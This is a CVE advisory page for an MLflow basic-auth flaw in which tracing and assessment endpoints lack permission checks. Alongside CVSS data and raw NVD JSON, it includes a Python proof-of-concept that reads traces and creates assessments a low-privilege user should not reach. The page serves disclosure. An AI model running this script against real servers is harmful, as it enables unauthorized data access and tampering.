Security Vulnerability Report
CVE-2025-15381 CVSS 7.1 HIGH

CVE-2025-15381

Published: 2026-03-27 17:16:27
Last Modified: 2026-04-28 14:32:09

Description

In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:* - VULNERABLE
MLFlow Latest Version (basic-auth enabled)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

TARGET_URL = "http://target-mlflow-server:5000"
USERNAME = "low_priv_user"
PASSWORD = "password"

session = requests.Session()

# 1. Authenticate with low-privilege user
login_payload = {"username": USERNAME, "password": PASSWORD}
login_resp = session.post(f"{TARGET_URL}/login", data=login_payload)
if login_resp.status_code != 200:
    print("Login failed")
    exit(1)
print("[+] Logged in successfully")

# 2. Exploit: Access Tracing Endpoint (Bypass Permission Check)
# Assuming a trace_id exists that the user should not have access to
trace_id = "arbitrary_trace_id"
trace_resp = session.get(f"{TARGET_URL}/api/2.0/mlflow/traces/get?trace_id={trace_id}")
print("[*] Attempting to access trace data...")
if trace_resp.status_code == 200:
    print(f"[+] Successfully accessed trace data (Bypassed ACL): {trace_resp.json()}")
else:
    print(f"[-] Failed to access trace data: {trace_resp.status_code}")

# 3. Exploit: Create Unauthorized Assessment
assessment_data = {
    "trace_id": trace_id,
    "name": "Malicious Assessment",
    "result": {"key": "value"},
}
assess_resp = session.post(f"{TARGET_URL}/api/2.0/mlflow/assessments/create", json=assessment_data)
print("[*] Attempting to create assessment...")
if assess_resp.status_code == 200:
    print("[+] Successfully created unauthorized assessment.")
else:
    print(f"[-] Failed to create assessment: {assess_resp.status_code}")
```

References

https://huntr.com/bounties/149fb2f9-ef4b-4136-a25c-20563451904c (Third Party Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-15381",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-27T17:16:26.573",
    "lastModified": "2026-04-28T14:32:08.523",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ],
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-200"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "F18F1880-033C-4E18-913C-6C5356427ABB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://huntr.com/bounties/149fb2f9-ef4b-4136-a25c-20563451904c",
        "source": "[email protected]",
        "tags": ["Third Party Advisory", "Exploit"]
      }
    ]
  }
}
```